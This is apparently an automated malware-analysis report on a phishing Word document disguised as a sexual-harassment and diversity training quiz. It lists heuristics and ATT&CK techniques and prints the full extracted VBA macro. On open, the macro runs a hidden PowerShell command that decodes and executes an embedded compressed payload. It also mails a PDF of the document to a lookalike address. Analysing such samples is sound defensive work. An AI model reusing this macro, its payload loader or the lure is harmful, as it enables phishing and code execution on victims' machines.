MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open and OLE_VBA_AUTOEXEC_EXEC heuristics. This macro references PowerShell and uses the Shell() function, strongly suggesting it downloads and executes a second-stage payload. The document body presents a fake training quiz to lure the user into enabling macros.
Heuristics 9
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (xt4) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
If Arch = "AMD64" Then fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" Else -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set OutApp = CreateObject("Outlook.Application") Set OutMail = OutApp.CreateItem(0) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton" Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Arch = Environ("PROCESSOR_ARCHITECTURE") windir = Environ("windir") -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4060 bytes |
SHA-256: 657fb53c9a6565b3c713805d12c38c7b3caf1c1ffaf2ecaf926e30cf2d3961d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
Private Sub Document_Open()
Dim fp2 As String
Dim fp1 As String
Dim xt4 As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
fp2 = "powershell.exe"
End If
fp1 = "nVRtc9pGEP7Or9jRXGekMZLFi90YjWfi4LihDY5riJ2WYTqHtKALpz"
fp1 = fp1 + "v5dMJgwn/vCquYfO0XnXa1t8+zu8+KPcElvHcak2spB1mujX"
fp1 = fp1 + "WdJRqFstMOEikdbwp5OZMihsJySweuLX2HgbJ31sCDMLbk8k"
fp1 = fp1 + "pKHbu1T+ZXSWKwKJpQCmUheR6JF6yN+WsspdJqvMnf3HdGW4"
fp1 = fp1 + "ytF/1vLn2D3OI4pSN54/JqX1lrxKy0eETK8nj5yuwQTD5jD+"
fp1 = fp1 + "wP7jtueIaEdbi8x6ISbiRfHEe+og0SKsN537Bms2UJddi5+t"
fp1 = fp1 + "C//njz26fB7398Ht5+ufvzfjT++vD47a+/+SxOcL5IxfelzJ"
fp1 = fp1 + "TOn0xhy9XzevMSttqd7tn5r+8unGCs+yk3V8bwjes15qWKK3"
fp1 = fp1 + "SIXbbytmDQltQH150Qu8l0Cmz18w34AUPkRWnQ/zL7Tm0Gf1"
fp1 = fp1 + "RmXkAP+AXCdSsMwccnuGh7u7fsFrZsXrF3olYQdH7MNRUXp7"
fp1 = fp1 + "7ep6BvJ5fAkom7QOsbrhKdgZ/xtcgoK0uCz6gWNvWmu6jmx+"
fp1 = fp1 + "bRUXaELeRGx9Rq2E54RXTK1gRHjxNg/+wiQJUQhTWxL0gNNS"
fp1 = fp1 + "5sXYXP/xn3e1wvUKQF19vtjgAWWyDG4DJxGUZMgC8tnHfp7e"
fp1 = fp1 + "TE27KUkGzElhVgQggYAdQF0hUJgvguKa6oAtKKkYxAzMGlnh"
fp1 = fp1 + "eeB4euUwTB1oZzsfr21aEyJ7dogxGalYjxTtNYhlzxBZppr1"
fp1 = fp1 + "d50fTRWDEXtAn4wKVI9nLqcylnJEvC3DJrStxFLCPjlgquBz"
fp1 = fp1 + "faFBazoEr/iLO+FKhs1GBZ8ImEh6YISL6uUxZofMJT1mmCM9"
fp1 = fp1 + "QvQkp+2g1C4q+znMBmkioejgYf4TxoRfAoqI/PBdyOPceLmC"
fp1 = fp1 + "LQRQSTDxuLe0HlVRuy4Fo/K6l5cs0td53U2rzonZ6etYOzs6"
fp1 = fp1 + "DdagXt9kWv2+2cMuWA12CabhEfv9p00gZmMzTXOBdK7CfEns"
fp1 = fp1 + "C/pc0Ch+A7bQd8RVaR8xhh77mpZ1mAn/OisKkpG2x9yXSv99"
fp1 = fp1 + "OfJ2yyvNZbM1x3wjCkoxt60aRu132prMgwoEVFo/N6MEUw5K"
fp1 = fp1 + "ZIuaSp9HW+cVnehLAJk9d9nrpsTXtERqftel4TDiBVaXTl+I"
fp1 = fp1 + "dDiE22blZHWO2bLq2vSkmi2f9U/JFEzGntMNak6nfn3TDc0f"
fp1 = fp1 + "DjdLv7Fw=="
xt4 = fp2 + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
xt4 = xt4 + "and ""Invoke-Expression $(New-Object IO.StreamRea"
xt4 = xt4 + "der ($(New-Object IO.Compression.DeflateStream ("
xt4 = xt4 + "$(New-Object IO.MemoryStream (,$([Convert]::From"
xt4 = xt4 + "Base64String(\"" " & fp1 & " \"" )))), [IO.Compr"
xt4 = xt4 + "ession.CompressionMode]::Decompress)), [Text.Enc"
xt4 = xt4 + "oding]::ASCII)).ReadToEnd();"""
Shell (xt4)
End Sub
Sub Mail_Workbook_1(vPath As String)
Dim OutApp As Object
Dim OutMail As Object
Set OutApp = CreateObject("Outlook.Application")
Set OutMail = OutApp.CreateItem(0)
On Error Resume Next
With OutMail
.To = "hr.training@vystar.training"
.CC = ""
.BCC = ""
.Subject = "VyStar Sexual Harassment & Diversity Training"
.Body = "I have completed the sexual harassment & diversity training!"
.Attachments.Add vPath
.Send
End With
On Error GoTo 0
Set OutMail = Nothing
Set OutApp = Nothing
MsgBox "Your training has been submitted successfully!", vbOKOnly, "Thank you"
End Sub
Private Sub Submit_Click()
Dim vDoc As Object
Dim vPath As String
vPath = ActiveDocument.Path & Application.PathSeparator & "VyStar_SHD_Training.pdf"
ActiveDocument.ExportAsFixedFormat OutputFileName:=vPath, _
ExportFormat:=wdExportFormatPDF, OpenAfterExport:=False, OptimizeFor:= _
wdExportOptimizeForPrint, Range:=wdExportAllDocument, From:=1, To:=1, _
Item:=wdExportDocumentWithMarkup, IncludeDocProps:=False, KeepIRM:=True, _
CreateBookmarks:=wdExportCreateNoBookmarks, DocStructureTags:=True, _
BitmapMissingFonts:=True, UseISO19005_1:=False
Call Mail_Workbook_1(vPath)
Kill vPath
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.